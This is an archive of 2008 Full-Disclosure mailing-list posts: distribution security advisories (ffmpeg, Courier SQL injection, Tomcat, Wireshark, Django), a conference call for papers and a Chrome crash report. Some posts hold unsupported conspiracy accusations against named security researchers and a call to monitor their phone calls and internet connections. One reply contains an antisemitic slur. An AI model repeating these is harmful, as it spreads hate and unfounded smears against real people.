=========== * Free in avcodec_close() avctx->rc_eq. Fix a memory leak. * Buffer overflow in /libavcodec/dca.c. (patch by Alexander E. Patrakov) * Prevent dts generation code to be executed when delay is> MAX_REORDER_DELAY, this fixes overflow in AVStream->pts_buffer. (in libavformat/utils.c()) * Tcp/udp memory leak Affected packages: Pardus 2008: mplayer, all before 0.0_20080825-92-11 ffmpeg, all before 0.4.9_20080825-46-14 Resolution ========== There are update(s) for mplayer, ffmpeg. You can update them via Package Manager or with a single command from console: pisi up mplayer ffmpeg References ========== * http://lists.mplayerhq.hu/pipermail/ffmpeg-cvslog/2008-August/016011.html * http://lists.mplayerhq.hu/pipermail/ffmpeg-cvslog/2008-August/016012.html * http://lists.mplayerhq.hu/pipermail/ffmpeg-cvslog/2008-August/016352.html * http://lists.mplayerhq.hu/pipermail/ffmpeg-cvslog/2008-August/016136.html ------------------------------------------------------------------------ From frankruder at hotmail.com Fri Sep 5 19:41:13 2008 From: frankruder at hotmail.com (cocoruder.) Date: Fri, 5 Sep 2008 18:41:13 +0000 Subject: [Full-disclosure] XCon 2008 Call for Paper In-Reply-To: <d65cd4390809050045k7037cba7g7bb8de93e5e44f5@mail.gmail.com> References: <d65cd4390809050045k7037cba7g7bb8de93e5e44f5@mail.gmail.com> Message-ID: <BAY129-W4854462690D76627C46F74CB580@phx.gbl> cool man! cool the Chinese guys! welcome to my blog:http://ruder.cdut.net Date: Fri, 5 Sep 2008 15:45:01 +0800From: smaillist at gmail.comTo: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.ukSubject: [Full-disclosure] XCon 2008 Call for Paper XCon 2008 Call for Paper Nov. 18th ?C 19th, 2008, Beijing, PRC (http://xcon.xfocus.net) XCon is wholeheartedly expecting papers from those who are passionate about information security technique and their participation and sharing of the conference. Attenders Anyone who loves information security, including information security experts and fans, network administrators, network security consultants, CIO, hacker technique fans, etc. Location : Beijing Jintai Hotel http://www.bjjintaihotel.com/ Topics include (but not limited to): --- Security in new fields - Vista - Web 2.0 - 3G/4G network - Mobile Handset - Banks & financial institutes - GRPS & CDMA - Routing device - Visualization technique --- Application security - Web application vulnerability research - Application reverse engineering and related automated tools - Database security & attacks - Protocol security & exploitation - Advanced Trojans, worms and backdoor technique - Encryption & decryption technique --- Intrusion detection/forensics analysis - File system analysis & recovery - Real-time data structure recovery - Reverse engineering (malicious code analysis technique, vulnerability research) - Traffic analysis - Intrusion detection and anti-detection technique --- Wireless & VoIP security - 802.11x, CDPD, Bluetooth, WAP/TDMA, GSM, SMS - PDA & mobile protocol analysis - Palm, Pocket Pc - Wireless gateway - VoIP security & vulnerability analysis - WLANs hardening & vulnerability analysis ---P2P technique - Instant messenger (MSN, Skype, ICQ, etc.) - P2P application (BT, Emule, Thunder, online multi-media, etc.) Paper Submission The submitted paper will include the following information : 1) Brief introduction to the topic. Please clarify if the topic has been previously publicized, and if so, the distribution scope. 2) Speaker's self introduction and work experience. 3) Speaker's contact information: full name, alias, nationality, network nickname, e-mail, tel, fax, current working place and company, IM (MSN, ICQ, YM, AIM or others). 4) Presentation details: - duration - if any new tool/vulnerability/exploit will be released 5) The paper must include both PPT (for presentation) and WORD (for detailed description) in MS Office or OpenOffice format. All the papers will be submitted to cfp at xfocus.org for preliminary selection. The deadline for submission is Oct. 10th, 2008, and deadline for confirmation is Oct. 20th, 2008. No matter if the paper is accepted, we will officially inform you by the provided contact method within 5 working days. Some important dates * Deadline for submission ?C Oct. 10th, 2008 * Deadline for confirmation ?C Oct. 20th, 2008 Speakers' privilege If your paper is accepted by XCon, you will be invited to give an individual lecture in XCon. The speakers will be provided with : - Round-trip plane ticket (Economy class, and one person only. Foreign speakers up to 1,200 USD) - Two days' food and accommodation - Invitation to celebration party - Tour to some well-known scenic spots and historical sites in Beijing, taste of Chinese flavored food - Luck drawImportant : - Speakers must provide corresponding invoice or credential. - XCon reserves the right of final explanation. For more information about the conference, please contact xcon at xfocus.org or professional XCon2008 organizer. MSN: xfocusxcon at hotmail.com; tel : 086-010-62029792 Application In order to attend the conference, please register at XCon website (http://xcon.xfocus.net) or directly contact the organizer mentioned above. We will offer different discounts according to the time of application. Attenders' food and accommodation will be covered by themselves, and XCon will provide restaurant reservation and other service. Other information : All the information about XCon will be released on XCon and Xfocus website. Please visit http://xcon.xfocus.org/ for more information about speakers, agenda and previous XCon documents. Thank you for your support on XCon ! _________________________________________________________________ MSN ???????????????????????????????????????? http://cn.msn.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080905/40f6b37c/attachment.html From hannibal at switched.com Fri Sep 5 20:10:11 2008 From: hannibal at switched.com (hannibal) Date: Fri, 05 Sep 2008 20:10:11 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <4b6ee9310809041633yb8e4b77vc00d8344f00bc60f@mail.gmail.com> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> <!&!AAAAAAAAAAAYAAAAAAAAAAVYH6z3dz1PlKZBgMlD+37CgAAAEAAAAFVn+I71EzVNkkthOpmt9sMBAAAAAA==@brainiacghost.co.uk> <4b6ee9310809041632m5d7c3394o3769c8a150424c85@mail.gmail.com> <4b6ee9310809041633yb8e4b77vc00d8344f00bc60f@mail.gmail.com> Message-ID: <48C18413.2090304@switched.com> n3td3v wrote: > On Thu, Sep 4, 2008 at 5:46 PM, Chris Pritchard > <mailinglist at brainiacghost.co.uk> wrote: > >> I don't think it's "your" list, and even if it was, you didn't have to be so >> rude about it >> >> > > Its Gadi Evron's list because Mossad told him to make it so. Who's > really in control of the propaganda on this mailing list, Gadi Evron, > he gets quoted in all the journalist articles as soon as he spams some > new claim about which country is to blame for a cyber attack, and the > journalists believe him, then it becomes the true version of events... > even if its not really. > > Thats why I think its time for journalists to rethink who the > "trusted" security professionals are and who is gaming the system for > political outcomes, that an intelligence agency has told them to make > happen. > > Its true that Full-Disclosure is a powerful platform, and all it needs > is a couple of Gadi Evron's and Dancho Danchev's spamming what the > "truth" is and everyone goes with it. > > I find it suspicious that Dancho Danchev was a standard blogspot > blogger one week, then after about two posts on Full-Disclosure was > suddenly upgraded to the Zdnet zero-day blog... splitting out more > information about cyber attacks and which country is to blame. > > We've got to keep an eye on the so-called "trusted" security > professionals now, because they are trying to game the system for a > political end, the intelligence services in U.S are responsible for a > number of cyber attacks, which have been blamed on other countries and > entities. > > I post proof that Marcus Sachs wants to influence the political system > in America at the highest level of government, so his group can get > lots of money. > > So we know the mind set which is going on right now, so its not like I > haven't post proof, intelligence agencies and certain "trusted" > security professionals want control of "cyber" and they will do > anything they can to get it. We must proceed with caution and think > carefully about who is telling the truth before quoting "trusted" > security professionals from now on. > > The Marcus Sachs Youtube video is extremely damaging for the security > industry, what the true intentions are of some people and how power > hungry they are. Would Marcus Sachs, Gadi Evron and Dancho Danchev etc > tell a lie to become more powerful, you bet they would, especially if > being leaned on by certain rogue elements of the intelligence > agencies. > > The truth is, there are people out there looking to ramp up cyber > security as a national security agenda, even though naturally cyber > security is no where near being a national security issue, they still > want to ramp it up anyway because it will give them power and money in > an area that has yet to be decided upon. > > "Cyber" is like a new area, and folks are racing to become the leaders > of cyber before one another, thats why its a dangerous time right now > and there is lots of propaganda flying around the mailing lists as > soon as a cyber attack happens, which are probably false flags anyway > created by the very people who are on Youtube videos looking for ways > to become powerful with lots of money. > > I found the Cnet news article that goes with the Youtube video, we > have *some* of the people that are power hungry in the photograph > thats on the Cnet News article. > > 'Cybersecurity commission' to proffer advice to next president > http://news.cnet.com/8301-13578_3-10009603-38.html > > We've got to follow these people around in real life, monitor their > internet connection and phone calls to see who are have discussions > with, so no foul play happens because they are so desperate to impress > the next administration. > > All the best, > > n3td3v How does this pertain to the Google Chrome Browser vuln? We all know that Evron is a moronic jew, who cares? From marcio.barbado at gmail.com Fri Sep 5 20:41:44 2008 From: marcio.barbado at gmail.com (M.B.Jr.) Date: Fri, 5 Sep 2008 16:41:44 -0300 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <8a6b8e350809022134w232c17cbrb7c7e31e2e4f5e8@mail.gmail.com> References: <985632087.20080903052045@gmail.com> <9B9E7EA67E1B1342B2D25F3FD1B32930012692C1@BE35.exg3.exghost.com> <8a6b8e350809022134w232c17cbrb7c7e31e2e4f5e8@mail.gmail.com> Message-ID: <2df3b0cb0809051241m338eacabw114614293cfcfd8f@mail.gmail.com> Well, "things" keep happening to Safari as a matter of fact. On 9/3/08, James Matthews <nytrokiss at gmail.com> wrote: > The same thing happened to safari when it came out on windows. > > > On Tue, Sep 2, 2008 at 5:13 PM, Larry Seltzer <larry at larryseltzer.com> > wrote: > > > Holy crap, a crash bug in a beta browser! > > > > Larry Seltzer > > eWEEK.com Security Center Editor > > http://security.eweek.com/ > > http://blogs.pcmag.com/securitywatch/ > > Contributing Editor, PC Magazine > > larry.seltzer at ziffdavisenterprise.com > > > > > > > > > > > > -----Original Message----- > > From: full-disclosure-bounces at lists.grok.org.uk > > [mailto:full-disclosure-bounces at lists.grok.org.uk] On > Behalf Of Rishi > > Narang > > Sent: Tuesday, September 02, 2008 7:51 PM > > To: full-disclosure at lists.grok.org.uk > > Subject: [Full-disclosure] Google Chrome Browser Vulnerability > > > > Hi, > > > > --------------------------------------------------- > > Software: > > Google Chrome Browser 0.2.149.27 > > > > Tested: > > Windows XP Professional SP3 > > > > Result: > > Google Chrome Crashes with All Tabs > > > > Problem: > > An issue exists in how chrome behaves with undefined-handlers in > > chrome.dll version 0.2.149.27. A crash can result without user > > interaction. When a user is made to visit a malicious link, which has an > > undefined handler followed by a 'special' character, the chrome crashes > > with a Google Chrome message window "Whoa! Google Chrome has crashed. > > Restart now?". It fails in dealing with the POP EBP instruction when > > pointed out by the EIP register at 0x01002FF4. > > > > Proof of Concept: > > http://evilfingers.com/advisory/google_chrome_poc.php > > > > Credit: > > Rishi Narang (psy.echo) > > www.greyhat.in > > www.evilfingers.com > > --------------------------------------------------- > > > > -- > > Thanks & Regards, > > Rishi Narang | Security Researcher > > Founder, GREYHAT Insight > > Key: 0x8D67A3A3 (www.greyhat.in/key.asc) > > www.greyhat.in > > > > ... eschew obfuscation, espouse elucidation. > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > -- > http://www.goldwatches.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Marcio Barbado, Jr. From xploitable at gmail.com Fri Sep 5 21:53:27 2008 From: xploitable at gmail.com (n3td3v) Date: Fri, 5 Sep 2008 21:53:27 +0100 Subject: [Full-disclosure] Google Chrome Browser Vulnerability In-Reply-To: <48C18413.2090304@switched.com> References: <6092063.749501220528773789.JavaMail.juha-matti.laurio@netti.fi> <5ae653bf0809040532i4080046em209db2ea16409185@mail.gmail.com> <!&!AAAAAAAAAAAYAAAAAAAAAAVYH6z3dz1PlKZBgMlD+37CgAAAEAAAAFVn+I71EzVNkkthOpmt9sMBAAAAAA==@brainiacghost.co.uk> <4b6ee9310809041632m5d7c3394o3769c8a150424c85@mail.gmail.com> <4b6ee9310809041633yb8e4b77vc00d8344f00bc60f@mail.gmail.com> <48C18413.2090304@switched.com> Message-ID: <4b6ee9310809051353j4a901b01n721c073d7278af9b@mail.gmail.com> On Fri, Sep 5, 2008 at 8:10 PM, hannibal <hannibal at switched.com> wrote: > We all know that Evron is a moronic jew, who cares? > How should the community deal with Gadi Evron emails? Should we be shooting for a complete ban of cyber politics as well as normal politics which is already banned? If people want to talk cyber politics then the community could setup a cyber-politics mailing list so we can rant to each other all day about cyber politics. And it would get Gadi Evron and n3td3v off Full-Disclosure, and thats got to be a good thing. All the best, n3td3v From py at gentoo.org Fri Sep 5 21:56:31 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Fri, 05 Sep 2008 22:56:31 +0200 Subject: [Full-disclosure] [ GLSA 200809-05 ] Courier Authentication Library: SQL injection vulnerability Message-ID: <48C19CFF.1030808@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Courier Authentication Library: SQL injection vulnerability Date: September 05, 2008 Bugs: #225407 ID: 200809-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== An SQL injection vulnerability has been discovered in the Courier Authentication Library. Background ========== The Courier Authentication Library is a generic authentication API that encapsulates the process of validating account passwords. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/courier-authlib < 0.60.6 >= 0.60.6 Description =========== It has been discovered that some input (e.g. the username) passed to the library are not properly sanitised before being used in SQL queries. Impact ====== A remote attacker could provide specially crafted input to the library, possibly resulting in the remote execution of arbitrary SQL commands. NOTE: Exploitation of this vulnerability requires that a MySQL database is used for authentication and that a Non-Latin character set is selected. Workaround ========== There is no known workaround at this time. Resolution ========== All Courier Authentication Library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/courier-authlib-0.60.6" References ========== [ 1 ] CVE-2008-2667 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2667 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 260 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080905/33f7514b/attachment.bin From security at mandriva.com Fri Sep 5 23:49:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Fri, 05 Sep 2008 16:49:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:188 ] tomcat5 Message-ID: <E1Kbk6u-0000Ts-Hx@titan.mandriva.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:188 http://www.mandriva.com/security/ _______________________________________________________________________ Package : tomcat5 Date : September 5, 2008 Affected: 2008.0, 2008.1 _______________________________________________________________________ Problem Description: A number of vulnerabilities have been discovered in the Apache Tomcat server: The default catalina.policy in the JULI logging component did not restrict certain permissions for web applications which could allow a remote attacker to modify logging configuration options and overwrite arbitrary files (CVE-2007-5342). A cross-site scripting vulnerability was found in the HttpServletResponse.sendError() method which could allow a remote attacker to inject arbitrary web script or HTML via forged HTTP headers (CVE-2008-1232). A cross-site scripting vulnerability was found in the host manager application that could allow a remote attacker to inject arbitrary web script or HTML via the hostname parameter (CVE-2008-1947). A traversal vulnerability was found when using a RequestDispatcher in combination with a servlet or JSP that could allow a remote attacker to utilize a specially-crafted request parameter to access protected web resources (CVE-2008-2370). A traversal vulnerability was found when the 'allowLinking' and 'URIencoding' settings were actived which could allow a remote attacker to use a UTF-8-encoded request to extend their privileges and obtain local files accessible to the Tomcat process (CVE-2008-2938). The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 56ca5eb3e331c6675634a5e3f3c5afd7 2008.0/i586/tomcat5-5.5.23-9.2.10.2mdv2008.0.i586.rpm a1c688654decf045f80fb6d8978c73fa 2008.0/i586/tomcat5-admin-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm 2b7a97313ece05bbd5596045853cfca0 2008.0/i586/tomcat5-common-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm e8384332efad0e2317a646241bece6ee 2008.0/i586/tomcat5-jasper-5.5.23-9.2.10.2mdv2008.0.i586.rpm a30cc8061f55f2613c517574263cdd21 2008.0/i586/tomcat5-jasper-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm 4f4a12c8479f27c7f9ed877f5821afa3 2008.0/i586/tomcat5-jsp-2.0-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm ced904c459478c1123ed5da41dddbd7f 2008.0/i586/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm 183e045a9b44747c7a4adaec5c860441 2008.0/i586/tomcat5-server-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm 78af5a5788ac359a99a24f03a39c7b94 2008.0/i586/tomcat5-servlet-2.4-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm 8e8569bfab5abef912299b9b751e49e9 2008.0/i586/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm 6899c327906423cdd02b930221c2496e 2008.0/i586/tomcat5-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm 39fd3985d73f2f20efe4ed97c2a5e7c7 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: c4d1c4471c29d8cd34adb9f2002ef294 2008.0/x86_64/tomcat5-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm 2caf09173a64a378636496196d99756f 2008.0/x86_64/tomcat5-admin-webapps-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm d6a9a290638267a1117a55041986d31a 2008.0/x86_64/tomcat5-common-lib-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm 2eead87d72af58ddc9e934b55e49a1aa 2008.0/x86_64/tomcat5-jasper-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm 0fab26f89e83c882c5948a430bf82c8b 2008.0/x86_64/tomcat5-jasper-javadoc-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm 833334424b555a77e2a9951b71ed8fa3 2008.0/x86_64/tomcat5-jsp-2.0-api-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm 115561d6233c3890cf3b85a7599ed03b 2008.0/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm eccf76ede6fb9256a2b52c861a9b0bb3 2008.0/x86_64/tomcat5-server-lib-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm cd9df1a8a1a5cb3216221bdefdfe8476 2008.0/x86_64/tomcat5-servlet-2.4-api-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm f7440a4111ec2fd30fa32e4bd74a0a20 2008.0/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm 1464eb297888c4df98d8b7eabe7f0197 2008.0/x86_64/tomcat5-webapps-5.5.23-9.2.10.2mdv2008.0.x86_64.rpm 39fd3985d73f2f20efe4ed97c2a5e7c7 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.2mdv2008.0.src.rpm Mandriva Linux 2008.1: 594abdc70bc430657eb831520926c73f 2008.1/i586/tomcat5-5.5.25-1.2.1.1mdv2008.1.i586.rpm bdec2b83b4fdb4d10a01a65fbdac512d 2008.1/i586/tomcat5-admin-webapps-5.5.25-1.2.1.1mdv2008.1.i586.rpm 3dbc007722996d1c36f31642f80b5c2a 2008.1/i586/tomcat5-common-lib-5.5.25-1.2.1.1mdv2008.1.i586.rpm 04b23d162d13f84d1d8707646ea9148c 2008.1/i586/tomcat5-jasper-5.5.25-1.2.1.1mdv2008.1.i586.rpm 602bf7d4ff261e8af20d50b9e76634bb 2008.1/i586/tomcat5-jasper-eclipse-5.5.25-1.2.1.1mdv2008.1.i586.rpm 0066e7519a2d3478f0a3e70bd95a7e5b 2008.1/i586/tomcat5-jasper-javadoc-5.5.25-1.2.1.1mdv2008.1.i586.rpm 1ba4743762cfa4594a27f0393de47823 2008.1/i586/tomcat5-jsp-2.0-api-5.5.25-1.2.1.1mdv2008.1.i586.rpm 262f2a39b800562cef36d724ce3efa35 2008.1/i586/tomcat5-jsp-2.0-api-javadoc-5.5.25-1.2.1.1mdv2008.1.i586.rpm b9f2af35a734d0e3a2d9bfe292aaced1 2008.1/i586/tomcat5-server-lib-5.5.25-1.2.1.1mdv2008.1.i586.rpm 8307ef374c5b995feac394b6f27474d5 2008.1/i586/tomcat5-servlet-2.4-api-5.5.25-1.2.1.1mdv2008.1.i586.rpm 3f4692170c35f992defcb4111a8133cd 2008.1/i586/tomcat5-servlet-2.4-api-javadoc-5.5.25-1.2.1.1mdv2008.1.i586.rpm 02b9d28af879b825754eff6199bf1788 2008.1/i586/tomcat5-webapps-5.5.25-1.2.1.1mdv2008.1.i586.rpm 2621d41df35e895a1ed0ed471f93f211 2008.1/SRPMS/tomcat5-5.5.25-1.2.1.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 6b1e03e5206eb262970198dccba7d0a3 2008.1/x86_64/tomcat5-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm 930cf38058a0f8902e2741c6512e0aa0 2008.1/x86_64/tomcat5-admin-webapps-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm c527521cb93bab31df3f91422faf02a6 2008.1/x86_64/tomcat5-common-lib-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm f8bef98047ef956c8e4c0f877155e1f1 2008.1/x86_64/tomcat5-jasper-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm 97a8a59178259d26838ce20c176c459a 2008.1/x86_64/tomcat5-jasper-eclipse-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm 3bb885debc8576bd305c9fa4c9d25bfb 2008.1/x86_64/tomcat5-jasper-javadoc-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm 66dcf08e163fdaaf81992a7d25d84a20 2008.1/x86_64/tomcat5-jsp-2.0-api-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm dd92aab81bf4c75ab30b9b82153b24c0 2008.1/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm 517ed776282d089dd84f81d47104f660 2008.1/x86_64/tomcat5-server-lib-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm 83d4bb973b7fec461e812d74541a5949 2008.1/x86_64/tomcat5-servlet-2.4-api-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm cbdd58e1c9e1e8f0089af055abbd85e0 2008.1/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm cbee0f1f720269f77a66e30709ecd7ae 2008.1/x86_64/tomcat5-webapps-5.5.25-1.2.1.1mdv2008.1.x86_64.rpm 2621d41df35e895a1ed0ed471f93f211 2008.1/SRPMS/tomcat5-5.5.25-1.2.1.1mdv2008.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIwYsKmqjQ0CJFipgRApJjAKCVZ1XtEGoADQcp8l/m1ECSRstnjACg4qE8 j+sCdAEJN0CXvurmFcjUvNU= =+kFf -----END PGP SIGNATURE----- From xploitable at gmail.com Sat Sep 6 00:36:14 2008 From: xploitable at gmail.com (n3td3v) Date: Sat, 6 Sep 2008 00:36:14 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' Message-ID: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> "McKinnon is being used as a scapegoat in a bid to secure extra funding to protect US military networks, according to Bevan, who reckons a commercial organisation would never get away with such trickery." "I think it's all about timing and whether or not the hacker will make a good scapegoat whilst allowing the administration to request further money. The fear machine can keep churning out propaganda as per normal, but don't expect those machines to actually get better security." http://www.theregister.co.uk/2008/09/03/mckinnon_bevan_interview_analysis/ This is what I was talking about with the Marcus Sachs Youtube video, they are going to be using trickery to get money and impress the next administration. I feel sorry for Gary McKinnon that he is being used by the Marcus Sachs mind set who only care about money and power, they don't care about a man's life. All the best, n3td3v From xploitable at gmail.com Sat Sep 6 01:22:32 2008 From: xploitable at gmail.com (n3td3v) Date: Sat, 6 Sep 2008 01:22:32 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> Message-ID: <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> On Sat, Sep 6, 2008 at 12:36 AM, n3td3v <xploitable at gmail.com> wrote: > "McKinnon is being used as a scapegoat in a bid to secure extra > funding to protect US military networks, according to Bevan, who > reckons a commercial organisation would never get away with such > trickery." > > "I think it's all about timing and whether or not the hacker will make > a good scapegoat whilst allowing the administration to request further > money. The fear machine can keep churning out propaganda as per > normal, but don't expect those machines to actually get better > security." > > http://www.theregister.co.uk/2008/09/03/mckinnon_bevan_interview_analysis/ > > This is what I was talking about with the Marcus Sachs Youtube video, > they are going to be using trickery to get money and impress the next > administration. > > I feel sorry for Gary McKinnon that he is being used by the Marcus > Sachs mind set who only care about money and power, they don't care > about a man's life. > > All the best, > > n3td3v > Here is the Marcus Sachs Youtube video, I forgot to add it http://www.youtube.com/watch?v=FSUPTZVlkyU Maybe the Gary Mckinnon lawyers could use it to prove the U.S mind set right now as a last ditch hope. We can't allow a man to goto jail for life, if the reason is only for Marcus Sachs to get cyber security funding and power, thats just sickening. http://freegary.org.uk/ All the best, n3td3v From pinar at pardus.org.tr Sat Sep 6 02:11:45 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:11:45 +0300 Subject: [Full-disclosure] [PLSA 2008-38] Wireshark: Denial of Service Message-ID: <48C1D8D1.2020202@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-38 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 3 Type: Remote ------------------------------------------------------------------------ Summary ======= Some vulnerabilities have been reported in Wireshark, which can be exploited by malicious people to cause a DoS (Denial of Service). Description =========== 1) Various errors within epan/dissectors/packet-ncp2222.inc can be exploited to cause e.g. a crash or an infinite loop via specially crafted NCP packets. 2) An error while uncompressing zlib-compressed packet data can be exploited to cause a crash via specially crafted packets. Affected packages: Pardus 2008: wireshark, all before 1.0.3-22-4 Pardus 2007: wireshark, all before 1.0.3-22-18 Resolution ========== There are update(s) for wireshark. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up wireshark Pardus 2007: pisi up wireshark References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8119 * http://www.wireshark.org/security/wnpa-sec-2008-05.html * http://secunia.com/advisories/31674 ------------------------------------------------------------------------ -- P?nar Yanarda? Pardus Security Team http://security.pardus.org.tr From pinar at pardus.org.tr Sat Sep 6 02:12:10 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:12:10 +0300 Subject: [Full-disclosure] [PLSA 2008-37] Django: Cross Site Scripting Message-ID: <48C1D8EA.1010409@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-37 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 3 Type: Remote ------------------------------------------------------------------------ Summary ======= A vulnerability has been reported in Django, which can be exploited by malicious people to conduct cross-site request forgery attacks. Description =========== The vulnerability is caused due to the Django administration application not performing any validity checks to verify requests when re-authenticating the user. This can be exploited to delete and edit data when a not logged-in user e.g. visits a malicious web site and is then enticed to log in to the application. Affected packages: Pardus 2008: Django, all before 1.0-15-2 Pardus 2007: Django, all before 0.96.3-15-11 Resolution ========== There are update(s) for Django. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up Django Pardus 2007: pisi up Django References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8116 * http://www.djangoproject.com/weblog/2008/sep/02/security * http://secunia.com/advisories/31729 ------------------------------------------------------------------------ -- P?nar Yanarda? Pardus Security Team http://security.pardus.org.tr From pinar at pardus.org.tr Sat Sep 6 02:12:23 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:12:23 +0300 Subject: [Full-disclosure] [PLSA 2008-39] 